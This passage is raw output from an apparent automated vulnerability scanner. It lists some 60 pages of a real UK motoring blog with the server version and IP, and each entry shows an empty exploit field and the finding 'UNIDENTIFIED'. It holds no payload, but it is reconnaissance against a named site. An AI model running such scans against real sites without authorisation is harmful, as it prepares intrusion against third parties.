2538. |_[ + ] Found:: UNIDENTIFIED
2539.  
2540. _[ - ]::--------------------------------------------------------------------------------------------------------------
2541. |_[ + ] [ 28 / 100 ]-[11:55:21] [ - ]
2542. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/misfuel/ ]
2543. |_[ + ] Exploit::
2544. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2545. |_[ + ] More details:: / - / , ISP:
2546. |_[ + ] Found:: UNIDENTIFIED
2547.  
2548. _[ - ]::--------------------------------------------------------------------------------------------------------------
2549. |_[ + ] [ 29 / 100 ]-[11:55:23] [ - ]
2550. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/autobahn/ ]
2551. |_[ + ] Exploit::
2552. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2553. |_[ + ] More details:: / - / , ISP:
2554. |_[ + ] Found:: UNIDENTIFIED
2555.  
2556. _[ - ]::--------------------------------------------------------------------------------------------------------------
2557. |_[ + ] [ 30 / 100 ]-[11:55:24] [ - ]
2558. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/specialist/ ]
2559. |_[ + ] Exploit::
2560. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2561. |_[ + ] More details:: / - / , ISP:
2562. |_[ + ] Found:: UNIDENTIFIED
2563.  
2564. _[ - ]::--------------------------------------------------------------------------------------------------------------
2565. |_[ + ] [ 31 / 100 ]-[11:55:25] [ - ]
2566. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/team/ ]
2567. |_[ + ] Exploit::
2568. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2569. |_[ + ] More details:: / - / , ISP:
2570. |_[ + ] Found:: UNIDENTIFIED
2571.  
2572. _[ - ]::--------------------------------------------------------------------------------------------------------------
2573. |_[ + ] [ 32 / 100 ]-[11:55:27] [ - ]
2574. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/mondeo/ ]
2575. |_[ + ] Exploit::
2576. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2577. |_[ + ] More details:: / - / , ISP:
2578. |_[ + ] Found:: UNIDENTIFIED
2579.  
2580. _[ - ]::--------------------------------------------------------------------------------------------------------------
2581. |_[ + ] [ 33 / 100 ]-[11:55:28] [ - ]
2582. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/ford/ ]
2583. |_[ + ] Exploit::
2584. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2585. |_[ + ] More details:: / - / , ISP:
2586. |_[ + ] Found:: UNIDENTIFIED
2587.  
2588. _[ - ]::--------------------------------------------------------------------------------------------------------------
2589. |_[ + ] [ 34 / 100 ]-[11:55:29] [ - ]
2590. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/hose/ ]
2591. |_[ + ] Exploit::
2592. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2593. |_[ + ] More details:: / - / , ISP:
2594. |_[ + ] Found:: UNIDENTIFIED
2595.  
2596. _[ - ]::--------------------------------------------------------------------------------------------------------------
2597. |_[ + ] [ 35 / 100 ]-[11:55:31] [ - ]
2598. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/kenton/ ]
2599. |_[ + ] Exploit::
2600. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2601. |_[ + ] More details:: / - / , ISP:
2602. |_[ + ] Found:: UNIDENTIFIED
2603.  
2604. _[ - ]::--------------------------------------------------------------------------------------------------------------
2605. |_[ + ] [ 36 / 100 ]-[11:55:32] [ - ]
2606. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/5w30/ ]
2607. |_[ + ] Exploit::
2608. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2609. |_[ + ] More details:: / - / , ISP:
2610. |_[ + ] Found:: UNIDENTIFIED
2611.  
2612. _[ - ]::--------------------------------------------------------------------------------------------------------------
2613. |_[ + ] [ 37 / 100 ]-[11:55:33] [ - ]
2614. |_[ + ] Target:: [ http://thegarageblog.co.uk/category/general-motoring/ ]
2615. |_[ + ] Exploit::
2616. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2617. |_[ + ] More details:: / - / , ISP:
2618. |_[ + ] Found:: UNIDENTIFIED
2619.  
2620. _[ - ]::--------------------------------------------------------------------------------------------------------------
2621. |_[ + ] [ 38 / 100 ]-[11:55:35] [ - ]
2622. |_[ + ] Target:: [ http://thegarageblog.co.uk/grease-junkie-ltd/ ]
2623. |_[ + ] Exploit::
2624. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2625. |_[ + ] More details:: / - / , ISP:
2626. |_[ + ] Found:: UNIDENTIFIED
2627.  
2628. _[ - ]::--------------------------------------------------------------------------------------------------------------
2629. |_[ + ] [ 39 / 100 ]-[11:55:36] [ - ]
2630. |_[ + ] Target:: [ http://thegarageblog.co.uk/the-garage/mechanics/ ]
2631. |_[ + ] Exploit::
2632. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2633. |_[ + ] More details:: / - / , ISP:
2634. |_[ + ] Found:: UNIDENTIFIED
2635.  
2636. _[ - ]::--------------------------------------------------------------------------------------------------------------
2637. |_[ + ] [ 40 / 100 ]-[11:55:38] [ - ]
2638. |_[ + ] Target:: [ http://thegarageblog.co.uk/author/dave-g/ ]
2639. |_[ + ] Exploit::
2640. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2641. |_[ + ] More details:: / - / , ISP:
2642. |_[ + ] Found:: UNIDENTIFIED
2643.  
2644. _[ - ]::--------------------------------------------------------------------------------------------------------------
2645. |_[ + ] [ 41 / 100 ]-[11:55:39] [ - ]
2646. |_[ + ] Target:: [ http://thegarageblog.co.uk/tag/guest-post/ ]
2647. |_[ + ] Exploit::
2648. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2649. |_[ + ] More details:: / - / , ISP:
2650. |_[ + ] Found:: UNIDENTIFIED
2651.  
2652. _[ - ]::--------------------------------------------------------------------------------------------------------------
2653. |_[ + ] [ 42 / 100 ]-[11:55:40] [ - ]
2654. |_[ + ] Target:: [ http://thegarageblog.co.uk/author/admin/page/17/ ]
2655. |_[ + ] Exploit::
2656. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2657. |_[ + ] More details:: / - / , ISP:
2658. |_[ + ] Found:: UNIDENTIFIED
2659.  
2660. _[ - ]::--------------------------------------------------------------------------------------------------------------
2661. |_[ + ] [ 43 / 100 ]-[11:55:42] [ - ]
2662. |_[ + ] Target:: [ http://thegarageblog.co.uk/category/garage/page/2/ ]
2663. |_[ + ] Exploit::
2664. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2665. |_[ + ] More details:: / - / , ISP:
2666. |_[ + ] Found:: UNIDENTIFIED
2667.  
2668. _[ - ]::--------------------------------------------------------------------------------------------------------------
2669. |_[ + ] [ 44 / 100 ]-[11:55:43] [ - ]
2670. |_[ + ] Target:: [ http://thegarageblog.co.uk/author/admin/page/21/ ]
2671. |_[ + ] Exploit::
2672. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2673. |_[ + ] More details:: / - / , ISP:
2674. |_[ + ] Found:: UNIDENTIFIED
2675.  
2676. _[ - ]::--------------------------------------------------------------------------------------------------------------
2677. |_[ + ] [ 45 / 100 ]-[11:55:45] [ - ]
2678. |_[ + ] Target:: [ http://thegarageblog.co.uk/the-garage/customers-only/ ]
2679. |_[ + ] Exploit::
2680. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2681. |_[ + ] More details:: / - / , ISP:
2682. |_[ + ] Found:: UNIDENTIFIED
2683.  
2684. _[ - ]::--------------------------------------------------------------------------------------------------------------
2685. |_[ + ] [ 46 / 100 ]-[11:55:46] [ - ]
2686. |_[ + ] Target:: [ http://thegarageblog.co.uk/2013/11/21/vision-gran-turismo/ ]
2687. |_[ + ] Exploit::
2688. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2689. |_[ + ] More details:: / - / , ISP:
2690. |_[ + ] Found:: UNIDENTIFIED
2691.  
2692. _[ - ]::--------------------------------------------------------------------------------------------------------------
2693. |_[ + ] [ 47 / 100 ]-[11:55:47] [ - ]
2694. |_[ + ] Target:: [ http://thegarageblog.co.uk/got-a-question/comment-page-1/ ]
2695. |_[ + ] Exploit::
2696. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2697. |_[ + ] More details:: / - / , ISP:
2698. |_[ + ] Found:: UNIDENTIFIED
2699.  
2700. _[ - ]::--------------------------------------------------------------------------------------------------------------
2701. |_[ + ] [ 48 / 100 ]-[11:55:49] [ - ]
2702. |_[ + ] Target:: [ http://thegarageblog.co.uk/2008/11/04/starbucks-oil-and-sundries/ ]
2703. |_[ + ] Exploit::
2704. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2705. |_[ + ] More details:: / - / , ISP:
2706. |_[ + ] Found:: UNIDENTIFIED
2707.  
2708. _[ - ]::--------------------------------------------------------------------------------------------------------------
2709. |_[ + ] [ 49 / 100 ]-[11:55:50] [ - ]
2710. |_[ + ] Target:: [ http://thegarageblog.co.uk/2015/12/23/its-christmas-time-again/ ]
2711. |_[ + ] Exploit::
2712. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2713. |_[ + ] More details:: / - / , ISP:
2714. |_[ + ] Found:: UNIDENTIFIED
2715.  
2716. _[ - ]::--------------------------------------------------------------------------------------------------------------
2717. |_[ + ] [ 50 / 100 ]-[11:55:51] [ - ]
2718. |_[ + ] Target:: [ http://thegarageblog.co.uk/the-garage/check-out-these-special-offers/ ]
2719. |_[ + ] Exploit::
2720. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2721. |_[ + ] More details:: / - / , ISP:
2722. |_[ + ] Found:: UNIDENTIFIED
2723.  
2724. _[ - ]::--------------------------------------------------------------------------------------------------------------
2725. |_[ + ] [ 51 / 100 ]-[11:55:53] [ - ]
2726. |_[ + ] Target:: [ http://thegarageblog.co.uk/2010/01/03/happy-new-year-from-thegarageblogcouk/ ]
2727. |_[ + ] Exploit::
2728. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2729. |_[ + ] More details:: / - / , ISP:
2730. |_[ + ] Found:: UNIDENTIFIED
2731.  
2732. _[ - ]::--------------------------------------------------------------------------------------------------------------
2733. |_[ + ] [ 52 / 100 ]-[11:55:54] [ - ]
2734. |_[ + ] Target:: [ http://thegarageblog.co.uk/2008/12/01/depreciation-the-winners-and-losers/ ]
2735. |_[ + ] Exploit::
2736. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2737. |_[ + ] More details:: / - / , ISP:
2738. |_[ + ] Found:: UNIDENTIFIED
2739.  
2740. _[ - ]::--------------------------------------------------------------------------------------------------------------
2741. |_[ + ] [ 53 / 100 ]-[11:55:56] [ - ]
2742. |_[ + ] Target:: [ http://thegarageblog.co.uk/2008/09/08/labour-rates-in-the-news/ ]
2743. |_[ + ] Exploit::
2744. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2745. |_[ + ] More details:: / - / , ISP:
2746. |_[ + ] Found:: UNIDENTIFIED
2747.  
2748. _[ - ]::--------------------------------------------------------------------------------------------------------------
2749. |_[ + ] [ 54 / 100 ]-[11:55:57] [ - ]
2750. |_[ + ] Target:: [ http://thegarageblog.co.uk/2011/12/05/classics-in-paris-still-going-strong/ ]
2751. |_[ + ] Exploit::
2752. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2753. |_[ + ] More details:: / - / , ISP:
2754. |_[ + ] Found:: UNIDENTIFIED
2755.  
2756. _[ - ]::--------------------------------------------------------------------------------------------------------------
2757. |_[ + ] [ 55 / 100 ]-[11:55:58] [ - ]
2758. |_[ + ] Target:: [ http://thegarageblog.co.uk/2008/09/28/mot-due-heres-a-little-reminder/ ]
2759. |_[ + ] Exploit::
2760. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2761. |_[ + ] More details:: / - / , ISP:
2762. |_[ + ] Found:: UNIDENTIFIED
2763.  
2764. _[ - ]::--------------------------------------------------------------------------------------------------------------
2765. |_[ + ] [ 56 / 100 ]-[11:56:00] [ - ]
2766. |_[ + ] Target:: [ http://thegarageblog.co.uk/2012/02/22/whatever-happened-to-the-trusty-crook-lock/ ]
2767. |_[ + ] Exploit::
2768. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2769. |_[ + ] More details:: / - / , ISP:
2770. |_[ + ] Found:: UNIDENTIFIED
2771.  
2772. _[ - ]::--------------------------------------------------------------------------------------------------------------
2773. |_[ + ] [ 57 / 100 ]-[11:56:01] [ - ]
2774. |_[ + ] Target:: [ http://thegarageblog.co.uk/2008/09/14/somewhere-in-a-muddy-field-in-malvern/ ]
2775. |_[ + ] Exploit::
2776. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2777. |_[ + ] More details:: / - / , ISP:
2778. |_[ + ] Found:: UNIDENTIFIED
2779.  
2780. _[ - ]::--------------------------------------------------------------------------------------------------------------
2781. |_[ + ] [ 58 / 100 ]-[11:56:02] [ - ]
2782. |_[ + ] Target:: [ http://thegarageblog.co.uk/2010/10/20/popemobile-and-jeep-in-dvla-mix-up/ ]
2783. |_[ + ] Exploit::
2784. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2785. |_[ + ] More details:: / - / , ISP:
2786. |_[ + ] Found:: UNIDENTIFIED
2787.  
2788. _[ - ]::--------------------------------------------------------------------------------------------------------------
2789. |_[ + ] [ 59 / 100 ]-[11:56:04] [ - ]
2790. |_[ + ] Target:: [ http://thegarageblog.co.uk/2008/12/13/mot-myths-and-a-few-testing-truths/ ]
2791. |_[ + ] Exploit::
2792. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2793. |_[ + ] More details:: / - / , ISP:
2794. |_[ + ] Found:: UNIDENTIFIED
2795.  
2796. _[ - ]::--------------------------------------------------------------------------------------------------------------
2797. |_[ + ] [ 60 / 100 ]-[11:56:05] [ - ]
2798. |_[ + ] Target:: [ http://thegarageblog.co.uk/2010/01/14/more-winter-woes-whats-snow-good-for/ ]
2799. |_[ + ] Exploit::
2800. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2801. |_[ + ] More details:: / - / , ISP:
2802. |_[ + ] Found:: UNIDENTIFIED
2803.  
2804. _[ - ]::--------------------------------------------------------------------------------------------------------------
2805. |_[ + ] [ 61 / 100 ]-[11:56:07] [ - ]
2806. |_[ + ] Target:: [ http://thegarageblog.co.uk/2009/05/29/spring-has-sprung-straight-through-the-tyre/ ]
2807. |_[ + ] Exploit::
2808. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2809. |_[ + ] More details:: / - / , ISP:
2810. |_[ + ] Found:: UNIDENTIFIED
2811.  
2812. _[ - ]::--------------------------------------------------------------------------------------------------------------
2813. |_[ + ] [ 62 / 100 ]-[11:56:08] [ - ]
2814. |_[ + ] Target:: [ http://thegarageblog.co.uk/2009/09/24/pity-the-poor-car-dealer-for-a-change/ ]
2815. |_[ + ] Exploit::
2816. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2817. |_[ + ] More details:: / - / , ISP:
2818. |_[ + ] Found:: UNIDENTIFIED
2819.  
2820. _[ - ]::--------------------------------------------------------------------------------------------------------------
2821. |_[ + ] [ 63 / 100 ]-[11:56:09] [ - ]
2822. |_[ + ] Target:: [ http://thegarageblog.co.uk/2016/04/12/they-dont-call-them-main-stealers-for-nothing/ ]
2823. |_[ + ] Exploit::
2824. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2825. |_[ + ] More details:: / - / , ISP:
2826. |_[ + ] Found:: UNIDENTIFIED
2827.  
2828. _[ - ]::--------------------------------------------------------------------------------------------------------------
2829. |_[ + ] [ 64 / 100 ]-[11:56:11] [ - ]
2830. |_[ + ] Target:: [ http://thegarageblog.co.uk/2013/11/07/the-new-rogues-of-the-used-car-trade/ ]
2831. |_[ + ] Exploit::
2832. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2833. |_[ + ] More details:: / - / , ISP:
2834. |_[ + ] Found:: UNIDENTIFIED
2835.  
2836. _[ - ]::--------------------------------------------------------------------------------------------------------------
2837. |_[ + ] [ 65 / 100 ]-[11:56:12] [ - ]
2838. |_[ + ] Target:: [ http://thegarageblog.co.uk/2008/10/04/two-cans-of-lager-or-packet-of-biscuits/ ]
2839. |_[ + ] Exploit::
2840. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2841. |_[ + ] More details:: / - / , ISP:
2842. |_[ + ] Found:: UNIDENTIFIED
2843.  
2844. _[ - ]::--------------------------------------------------------------------------------------------------------------
2845. |_[ + ] [ 66 / 100 ]-[11:56:13] [ - ]
2846. |_[ + ] Target:: [ http://thegarageblog.co.uk/2015/04/22/motoring-around-the-world-more-tales-from-paraguay/ ]
2847. |_[ + ] Exploit::
2848. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2849. |_[ + ] More details:: / - / , ISP:
2850. |_[ + ] Found:: UNIDENTIFIED
2851.  
2852. _[ - ]::--------------------------------------------------------------------------------------------------------------
2853. |_[ + ] [ 67 / 100 ]-[11:56:15] [ - ]
2854. |_[ + ] Target:: [ http://thegarageblog.co.uk/2008/12/22/difficult-times-ahead-but-still-bargains-to-be-had/ ]
2855. |_[ + ] Exploit::
2856. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2857. |_[ + ] More details:: / - / , ISP:
2858. |_[ + ] Found:: UNIDENTIFIED
2859.  
2860. _[ - ]::--------------------------------------------------------------------------------------------------------------
2861. |_[ + ] [ 68 / 100 ]-[11:56:16] [ - ]
2862. |_[ + ] Target:: [ http://thegarageblog.co.uk/2014/08/18/some-popular-myths-about-garages-you-might-be-surprised/ ]
2863. |_[ + ] Exploit::
2864. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2865. |_[ + ] More details:: / - / , ISP:
2866. |_[ + ] Found:: UNIDENTIFIED
2867.  
2868. _[ - ]::--------------------------------------------------------------------------------------------------------------
2869. |_[ + ] [ 69 / 100 ]-[11:56:18] [ - ]
2870. |_[ + ] Target:: [ http://thegarageblog.co.uk/2008/11/21/a-bit-of-mechanical-sympathy-goes-a-long-way/ ]
2871. |_[ + ] Exploit::
2872. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2873. |_[ + ] More details:: / - / , ISP:
2874. |_[ + ] Found:: UNIDENTIFIED
2875.  
2876. _[ - ]::--------------------------------------------------------------------------------------------------------------
2877. |_[ + ] [ 70 / 100 ]-[11:56:19] [ - ]
2878. |_[ + ] Target:: [ http://thegarageblog.co.uk/2013/10/24/common-parts-that-go-wrong-on-the-ford-mondeo/ ]
2879. |_[ + ] Exploit::
2880. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2881. |_[ + ] More details:: / - / , ISP:
2882. |_[ + ] Found:: UNIDENTIFIED
2883.  
2884. _[ - ]::--------------------------------------------------------------------------------------------------------------
2885. |_[ + ] [ 71 / 100 ]-[11:56:20] [ - ]
2886. |_[ + ] Target:: [ http://thegarageblog.co.uk/2012/12/11/more-winter-woes-time-to-get-that-battery-checked/ ]
2887. |_[ + ] Exploit::
2888. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2889. |_[ + ] More details:: / - / , ISP:
2890. |_[ + ] Found:: UNIDENTIFIED
2891.  
2892. _[ - ]::--------------------------------------------------------------------------------------------------------------
2893. |_[ + ] [ 72 / 100 ]-[11:56:22] [ - ]
2894. |_[ + ] Target:: [ http://thegarageblog.co.uk/2011/10/30/why-theres-always-a-story-behind-the-roadside-debris/ ]
2895. |_[ + ] Exploit::
2896. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2897. |_[ + ] More details:: / - / , ISP:
2898. |_[ + ] Found:: UNIDENTIFIED
2899.  
2900. _[ - ]::--------------------------------------------------------------------------------------------------------------
2901. |_[ + ] [ 73 / 100 ]-[11:56:23] [ - ]
2902. |_[ + ] Target:: [ http://thegarageblog.co.uk/2012/07/15/joining-the-queue-at-the-kosovo-car-wash-why-the/ ]
2903. |_[ + ] Exploit::
2904. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2905. |_[ + ] More details:: / - / , ISP:
2906. |_[ + ] Found:: UNIDENTIFIED
2907.  
2908. _[ - ]::--------------------------------------------------------------------------------------------------------------
2909. |_[ + ] [ 74 / 100 ]-[11:56:25] [ - ]
2910. |_[ + ] Target:: [ http://thegarageblog.co.uk/2008/10/28/breakdowns-can-be-avoided-if-you-buy-the-right-car/ ]
2911. |_[ + ] Exploit::
2912. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2913. |_[ + ] More details:: / - / , ISP:
2914. |_[ + ] Found:: UNIDENTIFIED
2915.  
2916. _[ - ]::--------------------------------------------------------------------------------------------------------------
2917. |_[ + ] [ 75 / 100 ]-[11:56:26] [ - ]
2918. |_[ + ] Target:: [ http://thegarageblog.co.uk/2009/06/16/where-are-they-now-on-ebay-for-a-small-fortune/ ]
2919. |_[ + ] Exploit::
2920. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2921. |_[ + ] More details:: / - / , ISP:
2922. |_[ + ] Found:: UNIDENTIFIED
2923.  
2924. _[ - ]::--------------------------------------------------------------------------------------------------------------
2925. |_[ + ] [ 76 / 100 ]-[11:56:27] [ - ]
2926. |_[ + ] Target:: [ http://thegarageblog.co.uk/2010/04/22/ooh-i-want-one-of-those-but-watch-those-options/ ]
2927. |_[ + ] Exploit::
2928. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2929. |_[ + ] More details:: / - / , ISP:
2930. |_[ + ] Found:: UNIDENTIFIED
2931.  
2932. _[ - ]::--------------------------------------------------------------------------------------------------------------
2933. |_[ + ] [ 77 / 100 ]-[11:56:29] [ - ]
2934. |_[ + ] Target:: [ http://thegarageblog.co.uk/2010/05/30/pride-and-prejudice-why-we-choose-the-cars-we-drive/ ]
2935. |_[ + ] Exploit::
2936. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2937. |_[ + ] More details:: / - / , ISP:
2938. |_[ + ] Found:: UNIDENTIFIED
2939.  
2940. _[ - ]::--------------------------------------------------------------------------------------------------------------
2941. |_[ + ] [ 78 / 100 ]-[11:56:30] [ - ]
2942. |_[ + ] Target:: [ http://thegarageblog.co.uk/2015/10/03/the-curious-case-of-the-customer-that-couldnt-be-pleased/ ]
2943. |_[ + ] Exploit::
2944. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2945. |_[ + ] More details:: / - / , ISP:
2946. |_[ + ] Found:: UNIDENTIFIED
2947.  
2948. _[ - ]::--------------------------------------------------------------------------------------------------------------
2949. |_[ + ] [ 79 / 100 ]-[11:56:32] [ - ]
2950. |_[ + ] Target:: [ http://thegarageblog.co.uk/2010/08/04/car-of-the-year-the-jokes-not-on-skoda-anymore/ ]
2951. |_[ + ] Exploit::
2952. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2953. |_[ + ] More details:: / - / , ISP:
2954. |_[ + ] Found:: UNIDENTIFIED
2955.  
2956. _[ - ]::--------------------------------------------------------------------------------------------------------------
2957. |_[ + ] [ 80 / 100 ]-[11:56:33] [ - ]
2958. |_[ + ] Target:: [ http://thegarageblog.co.uk/2015/07/29/treat-your-car-to-a-terraclean-treatment-and-feel-the-benefits/ ]
2959. |_[ + ] Exploit::
2960. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2961. |_[ + ] More details:: / - / , ISP:
2962. |_[ + ] Found:: UNIDENTIFIED
2963.  
2964. _[ - ]::--------------------------------------------------------------------------------------------------------------
2965. |_[ + ] [ 81 / 100 ]-[11:56:34] [ - ]
2966. |_[ + ] Target:: [ http://thegarageblog.co.uk/2011/07/10/the-1500-minimum-px-rip-off-and-how-to-avoid-it/ ]
2967. |_[ + ] Exploit::
2968. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2969. |_[ + ] More details:: / - / , ISP:
2970. |_[ + ] Found:: UNIDENTIFIED
2971.  
2972. _[ - ]::--------------------------------------------------------------------------------------------------------------
2973. |_[ + ] [ 82 / 100 ]-[11:56:36] [ - ]
2974. |_[ + ] Target:: [ http://thegarageblog.co.uk/2008/10/06/youre-not-the-first-and-you-sure-wont-be-the-last/ ]
2975. |_[ + ] Exploit::
2976. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2977. |_[ + ] More details:: / - / , ISP:
2978. |_[ + ] Found:: UNIDENTIFIED
2979.  
2980. _[ - ]::--------------------------------------------------------------------------------------------------------------
2981. |_[ + ] [ 83 / 100 ]-[11:56:37] [ - ]
2982. |_[ + ] Target:: [ http://thegarageblog.co.uk/2012/02/13/more-changes-to-the-mot-test-but-frequency-stays-the-same/ ]
2983. |_[ + ] Exploit::
2984. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2985. |_[ + ] More details:: / - / , ISP:
2986. |_[ + ] Found:: UNIDENTIFIED
2987.  
2988. _[ - ]::--------------------------------------------------------------------------------------------------------------
2989. |_[ + ] [ 84 / 100 ]-[11:56:39] [ - ]
2990. |_[ + ] Target:: [ http://thegarageblog.co.uk/2009/11/25/when-diy-can-spell-divorce-the-battle-of-the-sexes-continues/ ]
2991. |_[ + ] Exploit::
2992. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
2993. |_[ + ] More details:: / - / , ISP:
2994. |_[ + ] Found:: UNIDENTIFIED
2995.  
2996. _[ - ]::--------------------------------------------------------------------------------------------------------------
2997. |_[ + ] [ 85 / 100 ]-[11:56:40] [ - ]
2998. |_[ + ] Target:: [ http://thegarageblog.co.uk/2010/03/02/hold-your-horses-why-im-a-sucker-for-a-red-i/ ]
2999. |_[ + ] Exploit::
3000. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
3001. |_[ + ] More details:: / - / , ISP:
3002. |_[ + ] Found:: UNIDENTIFIED
3003.  
3004. _[ - ]::--------------------------------------------------------------------------------------------------------------
3005. |_[ + ] [ 86 / 100 ]-[11:56:41] [ - ]
3006. |_[ + ] Target:: [ http://thegarageblog.co.uk/2009/03/11/leopards-and-taigas-kentons-and-yamazukis-–-the-world-on-2-wheels/ ]
3007. |_[ + ] Exploit::
3008. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
3009. |_[ + ] More details:: / - / , ISP:
3010. |_[ + ] Found:: UNIDENTIFIED
3011.  
3012. _[ - ]::--------------------------------------------------------------------------------------------------------------
3013. |_[ + ] [ 87 / 100 ]-[11:56:43] [ - ]
3014. |_[ + ] Target:: [ http://thegarageblog.co.uk/2012/09/03/a-post-paraguay-post-back-to-the-nanny-state-of-the-uk/ ]
3015. |_[ + ] Exploit::
3016. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
3017. |_[ + ] More details:: / - / , ISP:
3018. |_[ + ] Found:: UNIDENTIFIED
3019.  
3020. _[ - ]::--------------------------------------------------------------------------------------------------------------
3021. |_[ + ] [ 88 / 100 ]-[11:56:44] [ - ]
